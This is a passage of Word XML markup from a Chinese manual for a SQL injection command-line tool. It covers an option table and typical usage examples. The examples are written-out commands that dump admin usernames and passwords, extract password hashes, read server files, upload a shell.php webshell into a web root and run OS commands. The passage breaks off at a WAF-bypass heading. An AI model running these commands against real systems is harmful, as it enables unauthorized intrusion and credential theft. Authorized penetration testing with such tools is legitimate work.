                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--dbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7FEBA500">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>枚举全部数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="3D67045A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="1CC510F8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">枚举表（配合 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-D</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="765DC6DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="19FF601C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">枚举列（配合 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-D -T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="073BB108">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="36F10EDA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">导出表数据（配合 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-D -T [-C]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1EC7E222">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-D DB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-T TABLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-C COLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="378AA35C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>指定库 / 表 / 列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="192C4FAC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--start=N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--stop=N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="4C46F4D2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="13F48186">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--where=COND</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="67E32758">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WHERE 过滤条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="70567D3E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--sql-query=SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="0165CA0E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>执行自定义 SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7FDC2978">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--file-read=PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7949A7F8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>读取远程文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="1B0B781E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--file-write=FILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--file-dest=PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="762CC2BE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>上传本地文件到远程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="13EAEAB2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--os-cmd=CMD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6277AF4A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>执行操作系统命令（自动按数据库类型选择 UDF / xp_cmdshell 等通道）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
          </w:tcPr>
          <w:p w14:paraId="68383D44">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--no-cast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
          </w:tcPr>
          <w:p w14:paraId="05490078">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>关闭类型转换</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4871"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="072D4074">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--hex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4872"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="29A49CC4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>中文等非 ASCII 数据按 hex 读取（防乱码）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="757ADC00">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CBBB90">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2923"/>
        <w:gridCol w:w="6822"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2923"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="6CB4A46A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6821"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="199AB082">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2923"/>
          </w:tcPr>
          <w:p w14:paraId="05F0D020">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--output-dir=DIR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6821"/>
          </w:tcPr>
          <w:p w14:paraId="3DC4DD76">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">输出目录（默认 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>output/&lt;host&gt;_&lt;port&gt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2923"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="11CBC0DA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6821"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2BBD88A0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>非交互模式（默认即非交互，全部取默认答案）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2923"/>
          </w:tcPr>
          <w:p w14:paraId="1F282686">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6821"/>
          </w:tcPr>
          <w:p w14:paraId="039C75DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>显示版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2923"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="59777B82">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-h</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--help</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6821"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4FA65224">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>显示帮助</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02561786">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026AC44E">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="1F3B63"/>
        </w:pBdr>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="555F6E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--os-shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目前为保留参数，暂不支持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD854D2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>10.2 典型示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C055D6">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 基础检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008F6CD8">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SuperSQLInjectionV2.Cmd -u "http://127.0.0.1:8090/JVApp/mysql.jsp?id=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CDA836">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A4F3EC">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 提高检测级别 + 指定数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64643D46">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SuperSQLInjectionV2.Cmd -u "http://target/list.php?id=1" --level 3 --risk 2 --dbms mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699B23C">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CFC58E">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 原始报文 + 指定注入参数（JSON/Cookie 注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B4E652">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SuperSQLInjectionV2.Cmd -r req.txt -p token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A12EC">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213D53C4">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 检测 + 环境信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC4340">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SuperSQLInjectionV2.Cmd -u "http://target/a.php?id=1" --banner --current-user --current-db --is-dba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D750E">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B4816">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 逐级枚举</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3879280C">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SuperSQLInjectionV2.Cmd -u "..." --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A781E5A">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SuperSQLInjectionV2.Cmd -u "..." -D cms --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F129F46">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SuperSQLInjectionV2.Cmd -u "..." -D cms -T admin --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D9664">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SuperSQLInjectionV2.Cmd -u "..." -D cms -T admin -C "username,password" --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49750150">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A884A">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 大表分片 + 条件过滤 + 防中文乱码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C87BB0C">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SuperSQLInjectionV2.Cmd -u "..." -D cms -T users --dump --start 1 --stop 500 --where "id&gt;100" --hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804FA26">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A5A76">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 自定义 SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478183CC">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SuperSQLInjectionV2.Cmd -u "..." --sql-query="select user,host from mysql.user"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088CBCA6">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486BDA28">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 Hash / 权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC2DC30">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SuperSQLInjectionV2.Cmd -u "..." --passwords --privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB77428">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759EB390">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 文件与命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA3864">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SuperSQLInjectionV2.Cmd -u "..." --file-read="C:\\windows\\win.ini"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF7B94A">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SuperSQLInjectionV2.Cmd -u "..." --file-write=./shell.php --file-dest="C:\\inetpub\\wwwroot\\s.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418B497A">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SuperSQLInjectionV2.Cmd -u "..." --os-cmd="whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE1AFC0">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1DD2C">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 WAF 绕过组合</w:t>
      </w:r>
    </w:p>
